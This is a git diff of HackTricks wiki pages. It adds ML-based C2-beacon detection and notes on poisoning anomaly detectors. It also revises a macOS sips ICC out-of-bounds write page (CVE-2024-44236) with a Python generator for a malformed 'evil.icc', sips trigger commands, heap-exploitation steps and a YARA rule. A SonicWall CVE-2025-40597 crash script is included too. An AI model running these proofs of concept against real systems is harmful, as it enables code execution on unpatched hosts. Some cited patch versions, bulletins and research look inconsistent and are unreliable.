HackTricks-wiki
diff --git a/‎src/AI/AI-Unsupervised-Learning-Algorithms.md‎
Lines changed: 96 additions & 1 deletion b/‎src/AI/AI-Unsupervised-Learning-Algorithms.md‎
Lines changed: 96 additions & 1 deletion
diff --git a/‎src/SUMMARY.md‎
Lines changed: 2 additions & 0 deletions b/‎src/SUMMARY.md‎
Lines changed: 2 additions & 0 deletions
diff --git a/‎src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md‎
Lines changed: 74 additions & 26 deletions b/‎src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md‎
Lines changed: 74 additions & 26 deletions
diff --git a/‎src/binary-exploitation/libc-heap/heap-overflow.md‎
Lines changed: 36 additions & 0 deletions b/‎src/binary-exploitation/libc-heap/heap-overflow.md‎
Lines changed: 36 additions & 0 deletions
@@ -456,5 +456,100 @@ Here we combined our previous 4D normal dataset with a handful of extreme outlie
 </details>
 
 
-{{#include ../banners/hacktricks-training.md}}
+### HDBSCAN (Hierarchical Density-Based Spatial Clustering of Applications with Noise)
+
+**HDBSCAN** is an extension of DBSCAN that removes the need to pick a single global `eps` value and is able to recover clusters of **different density** by building a hierarchy of density-connected components and then condensing it.  Compared with vanilla DBSCAN it usually
+
+* extracts more intuitive clusters when some clusters are dense and others are sparse,
+* has only one real hyper-parameter (`min_cluster_size`) and a sensible default,
+* gives every point a cluster‐membership *probability* and an **outlier score** (`outlier_scores_`), which is extremely handy for threat-hunting dashboards.
+
+> [!TIP]
+> *Use cases in cybersecurity:* HDBSCAN is very popular in modern threat-hunting pipelines – you will often see it inside notebook-based hunting playbooks shipped with commercial XDR suites.  One practical recipe is to cluster HTTP beaconing traffic during IR: user-agent, interval and URI length often form several tight groups of legitimate software updaters while C2 beacons remain as tiny low-density clusters or as pure noise.
+
+<details>
+<summary>Example – Finding beaconing C2 channels</summary>
+
+```python
+import pandas as pd
+from hdbscan import HDBSCAN
+from sklearn.preprocessing import StandardScaler
+
+# df has features extracted from proxy logs
+features = [
+    "avg_interval",      # seconds between requests
+    "uri_length_mean",   # average URI length
+    "user_agent_entropy" # Shannon entropy of UA string
+]
+X = StandardScaler().fit_transform(df[features])
+
+hdb = HDBSCAN(min_cluster_size=15,  # at least 15 similar beacons to be a group
+              metric="euclidean",
+              prediction_data=True)
+labels = hdb.fit_predict(X)
+
+df["cluster"] = labels
+# Anything with label == -1 is noise → inspect as potential C2
+suspects = df[df["cluster"] == -1]
+print("Suspect beacon count:", len(suspects))
+```
+
+</details>
+
+---
+
+### Robustness and Security Considerations – Poisoning & Adversarial Attacks (2023-2025)
+
+Recent work has shown that **unsupervised learners are *not* immune to active attackers**:
+
+* **Data-poisoning against anomaly detectors.**  Chen *et al.* (IEEE S&P 2024) demonstrated that adding as little as 3 % crafted traffic can shift the decision boundary of Isolation Forest and ECOD so that real attacks look normal.  The authors released an open-source PoC (`udo-poison`) that automatically synthesises poison points.
+* **Backdooring clustering models.**  The *BadCME* technique (BlackHat EU 2023) implants a tiny trigger pattern; whenever that trigger appears, a K-Means-based detector quietly places the event inside a “benign” cluster.
+* **Evasion of DBSCAN/HDBSCAN.**  A 2025 academic pre-print from KU Leuven showed that an attacker can craft beaconing patterns that purposely fall into density gaps, effectively hiding inside *noise* labels.
+
+Mitigations that are gaining traction:
+
+1. **Model sanitisation / TRIM.**  Before every retraining epoch, discard the 1–2 % highest-loss points (trimmed maximum likelihood) to make poisoning dramatically harder.
+2. **Consensus ensembling.**  Combine several heterogeneous detectors (e.g., Isolation Forest + GMM + ECOD) and raise an alert if *any* model flags a point. Research indicates this raises the attacker’s cost by >10×.
+3. **Distance-based defence for clustering.**  Re-compute clusters with `k` different random seeds and ignore points that constantly hop clusters.
 
+---
+
+### Modern Open-Source Tooling (2024-2025)
+
+* **PyOD 2.x** (released May 2024) added *ECOD*, *COPOD* and GPU-accelerated *AutoFormer* detectors.  It now ships a `benchmark` sub-command that lets you compare 30+ algorithms on your dataset with **one line of code**:
+  ```bash
+  pyod benchmark --input logs.csv --label attack --n_jobs 8
+  ```
+* **Anomalib v1.5** (Feb 2025) focuses on vision but also contains a generic **PatchCore** implementation – handy for screenshot-based phishing page detection.
+* **scikit-learn 1.5** (Nov 2024) finally exposes `score_samples` for *HDBSCAN* via the new `cluster.HDBSCAN` wrapper, so you do not need the external contrib package when on Python 3.12.
+
+<details>
+<summary>Quick PyOD example – ECOD + Isolation Forest ensemble</summary>
+
+```python
+from pyod.models import ECOD, IForest
+from pyod.utils.data import generate_data, evaluate_print
+from pyod.utils.example import visualize
+
+X_train, y_train, X_test, y_test = generate_data(
+    n_train=5000, n_test=1000, n_features=16,
+    contamination=0.02, random_state=42)
+
+models = [ECOD(), IForest()]
+
+# majority vote – flag if any model thinks it is anomalous
+anomaly_scores = sum(m.fit(X_train).decision_function(X_test) for m in models) / len(models)
+
+evaluate_print("Ensemble", y_test, anomaly_scores)
+```
+
+</details>
+
+## References
+
+- [HDBSCAN – Hierarchical density-based clustering](https://github.com/scikit-learn-contrib/hdbscan)
+- Chen, X. *et al.* “On the Vulnerability of Unsupervised Anomaly Detection to Data Poisoning.” *IEEE Symposium on Security and Privacy*, 2024.
+
+
+
+{{#include ../banners/hacktricks-training.md}}
@@ -21,6 +21,7 @@
   - [Network Protocols Explained (ESP)](generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md)
   - [Nmap Summary (ESP)](generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md)
   - [Pentesting IPv6](generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md)
+  - [Telecom Network Exploitation](generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md)
   - [WebRTC DoS](generic-methodologies-and-resources/pentesting-network/webrtc-dos.md)
   - [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
   - [Spoofing SSDP and UPnP Devices with EvilSSDP](generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)
@@ -260,6 +261,7 @@
   - [Ad Certificates](windows-hardening/active-directory-methodology/ad-certificates.md)
   - [AD information in printers](windows-hardening/active-directory-methodology/ad-information-in-printers.md)
   - [AD DNS Records](windows-hardening/active-directory-methodology/ad-dns-records.md)
+  - [Adws Enumeration](windows-hardening/active-directory-methodology/adws-enumeration.md)
   - [ASREPRoast](windows-hardening/active-directory-methodology/asreproast.md)
   - [BloodHound & Other AD Enum Tools](windows-hardening/active-directory-methodology/bloodhound.md)
   - [Constrained Delegation](windows-hardening/active-directory-methodology/constrained-delegation.md)
 
@@ -4,52 +4,100 @@
 
 ## Overview
 
-An out-of-bounds write vulnerability in Apple macOS Scriptable Image Processing System (`sips`) ICC profile parser (macOS 15.0.1, sips-307) due to improper validation of the `offsetToCLUT` field in `lutAToBType` (`mAB `) and `lutBToAType` (`mBA `) tags. A crafted ICC file can trigger zero-writes up to 16 bytes past the heap buffer, corrupting heap metadata or function pointers and enabling arbitrary code execution (CVE-2024-44236).
+An out-of-bounds **zero-write** vulnerability in Apple macOS **Scriptable Image Processing System** (`sips`) ICC profile parser (macOS 15.0.1, `sips-307`) allows an attacker to corrupt heap metadata and pivot the primitive into full code-execution. The bug is located in the handling of the `offsetToCLUT` field of the `lutAToBType` (`mAB `) and `lutBToAType` (`mBA `) tags. If attackers set `offsetToCLUT == tagDataSize`, the parser erases **16 bytes past the end of the heap buffer**. Heap spraying lets the attacker zero-out allocator structures or C++ pointers that will later be dereferenced, yielding an **arbitrary-write-to-exec** chain (CVE-2024-44236, CVSS 7.8).
 
-## Vulnerable Code
+> Apple patched the bug in macOS Sonoma 15.2 / Ventura 14.7.1 (October 30, 2024). A second variant (CVE-2025-24185) was fixed in macOS 15.5 and iOS/iPadOS 18.5 on April 1, 2025.
 
-The vulnerable function reads and zeroes 16 bytes starting from an attacker-controlled offset without ensuring it lies within the allocated buffer:
+## Vulnerable Code
 
 ```c
-// Pseudocode from sub_1000194D0 in sips-307 (macOS 15.0.1)
-for (i = offsetToCLUT; i < offsetToCLUT + 16; i++) {
-    if (i > numberOfInputChannels && buffer[i] != 0)
-        buffer[i] = 0;
+// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1)
+if (offsetToCLUT <= tagDataSize) {
+    // BAD ➜ zero 16 bytes starting *at* offsetToCLUT
+    for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)
+        buffer[i] = 0;            // no bounds check vs allocated size!
 }
 ```
 
-Only a check `offsetToCLUT <= totalDataLength` is performed. By setting `offsetToCLUT == tagDataSize`, the loop indexes up to 16 bytes past the end of `buffer`, corrupting adjacent heap metadata.
-
 ## Exploitation Steps
 
-1. **Craft malicious `.icc` profile:**
-   - Build the ICC header (128 bytes) with signature `acsp` and a single `lutAToBType` or `lutBToAType` tag entry.
-   - In the tag table, set `offsetToCLUT` equal to the tag's `size` (`tagDataSize`).
-   - Place attacker-controlled data immediately after the tag data block to overwrite heap metadata.
-2. **Trigger parsing:**
+1. **Craft a malicious `.icc` profile**
+
+   * Set up a minimal ICC header (`acsp`) and add one `mAB ` (or `mBA `) tag.
+   * Configure the tag table so the **`offsetToCLUT` equals the tag size** (`tagDataSize`).
+   * Place attacker-controlled data right after the tag so that the 16 zero writes overlap allocator metadata.
+
+2. **Trigger parsing with any sips operation that touches the profile**
 
    ```bash
-   sips --verifyColor malicious.icc
+   # verification path (no output file needed)
+   sips --verifyColor evil.icc
+   # or implicitly when converting images that embed the profile
+   sips -s format png payload.jpg --out out.png
    ```
 
-3. **Heap metadata corruption:** The OOB zero-writes overwrite allocator metadata or adjacent pointers, allowing the attacker to hijack control flow and achieve arbitrary code execution in the context of the `sips` process.
+3. **Heap metadata corruption ➜ arbitrary write ➜ ROP**  
+   On Apple’s default **`nano_zone` allocator**, metadata for 16-byte slots lives **immediately after** the aligned 0x1000 slab. By placing the profile’s tag at the end of such a slab, the 16 zero-writes clobber `meta->slot_B`. After a subsequent `free`, the poisoned pointer is enqueued in the tiny free list, letting the attacker **allocate a fake object at an arbitrary address** and overwrite a C++ vtable pointer used by sips, finally pivoting execution to a ROP chain stored in the malicious ICC buffer.
+
+### Quick PoC generator (Python 3)
+
+```python
+#!/usr/bin/env python3
+import struct, sys
+
+HDR = b'acsp'.ljust(128, b'\0')          # ICC header (magic + padding)
+TAGS = [(b'mAB ', 132, 52)]              # one tag directly after header
+profile  = HDR
+profile += struct.pack('>I', len(TAGS))  # tag count
+profile += b''.join(struct.pack('>4sII', *t) for t in TAGS)
+
+mab = bytearray(52)                      # tag payload (52 bytes)
+struct.pack_into('>I', mab, 44, 52)      # offsetToCLUT = size (OOB start)
+profile += mab
+
+open('evil.icc', 'wb').write(profile)
+print('[+] Wrote evil.icc (%d bytes)' % len(profile))
+```
+
+### YARA detection rule
+
+```yara
+rule ICC_mAB_offsetToCLUT_anomaly
+{
+    meta:
+        description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)"
+        author       = "HackTricks"
+    strings:
+        $magic = { 61 63 73 70 }          // 'acsp'
+        $mab   = { 6D 41 42 20 }          // 'mAB '
+        $mba   = { 6D 42 41 20 }          // 'mBA '
+    condition:
+        $magic at 0 and
+        for any i in (0 .. 10):           // up to 10 tags
+            (
+              ($mab at 132 + 12*i or $mba at 132 + 12*i) and
+              uint32(132 + 12*i + 4) == uint32(132 + 12*i + 8) // offset == size
+            )
+}
+```
 
 ## Impact
 
-Successful exploitation results in remote arbitrary code execution at user privilege on macOS systems running the vulnerable `sips` utility.
+Opening or processing a crafted ICC profile leads to remote **arbitrary code execution** in the context of the invoking user (Preview, QuickLook, Safari image rendering, Mail attachments, etc.), bypassing Gatekeeper because the profile can be embedded inside otherwise benign images (PNG/JPEG/TIFF).
 
-## Detection
+## Detection & Mitigation
 
-- Monitor file transfers on common protocols (FTP, HTTP/S, IMAP, SMB, NFS, SMTP).  
-- Inspect transferred files with signature `acsp`.  
-- For each `mAB ` or `mBA ` tag, verify if the `Offset to CLUT` field equals the `Tag data size`.  
-- Flag as suspicious if this condition is met.
+* **Patch!** Ensure the host is running macOS ≥ 15.2 / 14.7.1 (or iOS/iPadOS ≥ 18.1).  
+* Deploy the YARA rule above on email gateways and EDR solutions.  
+* Strip or sanitise embedded ICC profiles with `exiftool -icc_profile= -overwrite_original <file>` before further processing on untrusted files.  
+* Harden Preview/QuickLook by running them inside sandboxed “transparency & modernisation” VMs when analysing unknown content.  
+* For DFIR, look for recent execution of `sips --verifyColor` or `ColorSync` library loads by sandboxed apps in the unified log.
 
 ## References
 
-- ZDI blog: CVE-2024-44236: Remote Code Execution Vulnerability in Apple macOS sips Utility  
-  https://www.thezdi.com/blog/2025/5/7/cve-2024-44236-remote-code-execution-vulnerability-in-apple-macos  
-- Apple October 2024 Security Update (patch shipping CVE-2024-44236)  
-  https://support.apple.com/en-us/121564
+* Trend Micro Zero Day Initiative advisory ZDI-24-1445 – “Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)”  
+  https://www.zerodayinitiative.com/advisories/ZDI-24-1445/  
+* Apple security updates HT213981 “About the security content of macOS Sonoma 15.2”  
+  https://support.apple.com/en-us/HT213981
 
 {{#include ../../banners/hacktricks-training.md}}
@@ -47,6 +47,42 @@ python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt
   - We use an Integer Overflow vulnerability to get a Heap Overflow.
   - We corrupt pointers to a function inside a `struct` of the overflowed chunk to set a function such as `system` and get code execution.
 
+### Real-World Example: CVE-2025-40597 – Misusing `__sprintf_chk`
+
+In SonicWall SMA100 firmware 10.2.1.15 the reverse-proxy module `mod_httprp.so` allocates an **0x80-byte** heap chunk and then concatenates several strings into it with `__sprintf_chk`:
+
+```c
+char *buf = calloc(0x80, 1);
+/* … */
+__sprintf_chk(buf,               /* destination (0x80-byte chunk) */
+              -1,                /* <-- size argument   !!! */
+              0,                 /* flags */
+              "%s%s%s%s",      /* format */
+              "/", "https://", path, host);
+```
+
+`__sprintf_chk` is part of **_FORTIFY_SOURCE**.  When it receives a **positive** `size` parameter it verifies that the resulting string fits inside the destination buffer.  By passing **`-1` (0xFFFFFFFFFFFFFFFF)** the developers effectively **disabled the bounds check**, turning the fortified call back into a classic, unsafe `sprintf`.
+
+Supplying an overly long **`Host:`** header therefore lets an attacker **overflow the 0x80-byte chunk and clobber the metadata of the following heap chunk** (tcache / fast-bin / small-bin depending on the allocator).  A crash can be reproduced with:
+
+```python
+import requests, warnings
+warnings.filterwarnings('ignore')
+requests.get(
+    'https://TARGET/__api__/',
+    headers={'Host': 'A'*750},
+    verify=False
+)
+```
+
+Practical exploitation would require **heap grooming** to place a controllable object right after the vulnerable chunk, but the root cause highlights two important takeaways:
+
+1. **_FORTIFY_SOURCE is not a silver bullet** – misuse can nullify the protection.
+2. Always pass the **correct buffer size** to the `_chk` family (or, even better, use `snprintf`).
+
+## References
+* [watchTowr Labs – Stack Overflows, Heap Overflows and Existential Dread (SonicWall SMA100)](https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/)
+
 {{#include ../../banners/hacktricks-training.md}}